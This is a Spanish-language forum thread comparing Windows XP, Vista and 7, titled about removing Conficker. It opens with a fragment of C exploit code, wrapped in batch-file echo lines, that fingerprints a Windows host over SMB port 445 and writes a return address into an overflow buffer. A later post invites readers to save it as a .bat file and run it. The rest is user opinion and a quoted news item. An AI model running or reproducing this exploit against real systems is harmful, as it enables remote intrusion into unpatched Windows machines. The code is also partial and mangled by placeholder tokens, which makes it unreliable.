%shell1%      if (os.dwMajorVersion==5) return (os.dwMinorVersion);
%shell1%      else return(-1);
%shell1%    }
%shell1%    if (WSAStartup(MAKEWORD(2,0),&ws)!=0) {
%shell1%      printf("[-] WsaStartup() failed\n");
%shell1%      exit(1);
%shell1%    }
%shell1%    //NetWkstaGetInfo
%shell1%    remote.sin_family = AF_INET;
%shell1%    remote.sin_addr.s_addr = inet_addr(host);
%shell1%    remote.sin_port = htons(445);    
%shell1%    sock=socket(AF_INET, SOCK_STREAM, 0);
%shell1%    printf("[+] Trying to fingerprint target.. ");
%shell1%   
%shell1%    if (connect(sock,(struct sockaddr *)&remote, sizeof(remote))>=0) {
%shell1%      if (send(sock, req1, sizeof(req1),0) >0) {
%shell1%          if (recv(sock, buf, sizeof (buf), 0) > 0) {
%shell1%            if (send(sock, req2, sizeof(req2),0) >0) {
%shell1%                i=recv(sock, buf, sizeof (buf), 0);
%shell1%                if (i>0) {
%shell1%                  printf("(%2.2x.%2.2x)\n",buf[0x60-1], buf[0x60]);
%shell1%                  if (buf[0x60-1]==5) {
%shell1%                      return(buf[0x60]);
%shell1%                  } else {
%shell1%                      printf("\n[-] Unssuported OS\n");
%shell1%                  }
%shell1%                } else {
%shell1%                  printf("\n[-] Recv2 failed\n");
%shell1%                }
%shell1%            } else {
%shell1%                printf("\n[-] Send2 failed\n");
%shell1%            }
%shell1%          } else {
%shell1%            printf("\n[-] Recv failed\n");
%shell1%          }
%shell1%      } else {
%shell1%          printf("\n[-] Send failed\n");
%shell1%      }
%shell1%    } else {
%shell1%      printf("\n[-] Connect failed\n");
%shell1%    }
%shell1%    return(-1);
%shell1% }
%shell1%
%shell1%
%shell1% void FillPaddedOffset(unsigned char *data, DWORD offset) {
%shell1%    // write return Address/DWORD to the buffer
%shell1%    data[1]  =(unsigned char)  offset & 0xFF;
%shell1%    data[3]  =(unsigned char) (offset >>8 ) & 0xFF;
%shell1%    data[5]  =(unsigned char) (offset >> 16 ) & 0xFF;
%shell1%    data[7]  =(unsigned char) (offset>> 24 ) & 0xFF;
%shell1% }
%jig%
@%own% %gk%%bf%%mq% %iu% %grt%%tgm% %lo%%vcx%



La prueba gráfica:



En conclusión, Windows Vista es un S.O mas, con muchas bondades y mejoras que su antecesor (tiene que ser así, o sino cual sería el objetivo de su aparición en el mercado) pero con muchas mas desventajas que lo hacen mas inestable y menos querido que su famosísimo antecesor... Windows XP. Esta conclusión no es solo mía, sino de la mayoría de usuarios de este S.O que tuvieron que volver a Windows XP ya que el Vista no lleno sus expectativas.

Para que vean los comentarios de la misma Microsoft acerca de el tema, he tomado un extracto de una noticia publicada en la página del PAIS y dice así:

Citación :
Estamos en el camino de disponer de la mejor versión de Windows de todos los tiempos". Steve Ballmer, presidente de Microsoft, presentaba con estas palabras la versión beta, (en pruebas) de Windows7 durante la inauguración de la feria de electrónica de consumo CES de Las Vegas.

"Va a arrancar más rápido, va a tener una batería más larga y tendrá menos alertas", adelantaba Ballmer sobre el nuevo sistema operativo, que nace con una dura tarea: borrar el mal sabor de boca que su antecesor Vista está dejando en el paladar de los usuarios.

La que podíamos llamar "Operación Perdamos de Vista a Vista" empezaba de manera paralela en Madrid con una presentación ante la prensa especializada de Windows 7. A grandes rasgos, las principales innovaciones del nuevo Windows giran en torno a hacer más fácil su manejo, una mayor personalización que evita los insistentes avisos y más compatibilidad con otros dispositivos, uno de los puntos en los que Vista ha dado más problemas.

Para terminar concuerdo con la opinión de DarkCry cuando dice que el nuevo Windows 7 revolucionará la industria informática ya que he instalado la versión beta y se nota de entrada la eficiencia con respecto al Windows Vista.

Saludos.

PD: Perdón por el doble post pero era que no me cupo en uno solo
Gracias newbyte eres el mejor hack
bueno... esta es uno de los posts mas interesantes y completos que he visto referente al tema, porque cuando se trata de tirarle a WinVista, NewByte está ahi... xD

Bueno profe ahora quiero yo dar mi punto de vista...

Algo que usted dice, de seguro es muy cierto, pero vamonos a un punto, WinVista cerro muchos huecos informáticos que WinXP poseía, y pues como usted nos dice en cada clase: "Los programas están hechos por humanos, por ende, los humanos se equivocan..." y eso perfectamente aunque pudo cerrar muchos de los huecos que XP poseia, tambien pudo abrir nuevos y dejar alguno de XP abierto...

Algo interesante que nos dijo el ingeniero de la Microsoft fue que si nunca somos capaces de dejar a XP por Vista, jamás podremos pasar de XP a 7, pues ¿cual es la razon para no usar vista?... La principal razon dada incluso por mi dentro de la conferencia, fue la incompatibilidad de programas con el mismo SO, cosa que si nos fijamos con lógica, lógica que él nos explico y punto que no habiamos notado, es que si un software no era compatible con WinVista, tampoco será compatible con Win7, pues el problema no es del SO, es de los mismos desarrolladores de la aplicacion que no han sacado version actulizada para este SO... Algo muy cierto...
Y respecto a la pregunta que usted depronto hara: ¿entonces todos nos tenemos que adaptar a lo que Microsoft quiera imponer? Pues la respuesta es SÍ, puesto que ellos son los que llevan el liderazgo en todo lo referente al avance tecnologico del planeta, por esto Vista ni 7 se tendrán que adaptar jamás a los software existentes, más bien, los software existentes se tienen que adaptar a los futuros y revolucionarios SO...

Bueno, ahi les deje mi opinion y pues si lo miramos con un punto de vista lógico lo que acabo de decir, tengo razon...

Es la primera vez que discuto y contradigo al profe... xD Pero ese es mi punto de vista...

Salu2!

PD: Seee NewByte es el Mejor Hack!!! xD
DarkCry escribió:
Algo interesante que nos dijo el ingeniero de la Microsoft fue que si nunca somos capaces de dejar a XP por Vista, jamás podremos pasar de XP a 7

Hay algo depronto errado en lo que dice DarkCry, nunca migre de WinXP a WinVista, pero apenas descarge el Windows 7 y lo instale en mi m´quina, lo instale en la maquina del trabajo, luego en un portatil de un compañero de trabajo y después de eso lo adopte como S.O principal, así que migre del WinXP al Win7 sin pasar por el WinVista...

El problema de compatibilidad con las impresoras de punto se me soluciono de una con el Win7, cosa que no pasaba con el Vista, y no tuve que montar los casi 10 parches al Win7 que tenía que montar en el WinVista para correr el Monica (software contable)...

Para los que quieran probar el exploit que posteo mas arriba, lo tiene que grabar como un archivo por lotes, es decir un .bat y en la imagen se ve claramente como lanzarlo.

Saludos!
Re: Desinfecta Tu PC De Conficker... Uno De Los Más Agresivos...
Mensaje Hoy a las 18:06 por Contenido patrocinado
 

Desinfecta Tu PC De Conficker... Uno De Los Más Agresivos...

Ver el tema anterior Ver el tema siguiente Volver arriba 

Página 1 de 1.

Permisos de este foro:No puedes responder a temas en este foro.
Dark Soul Master :: Soporte General :: Últimas Noticias-
Cambiar a: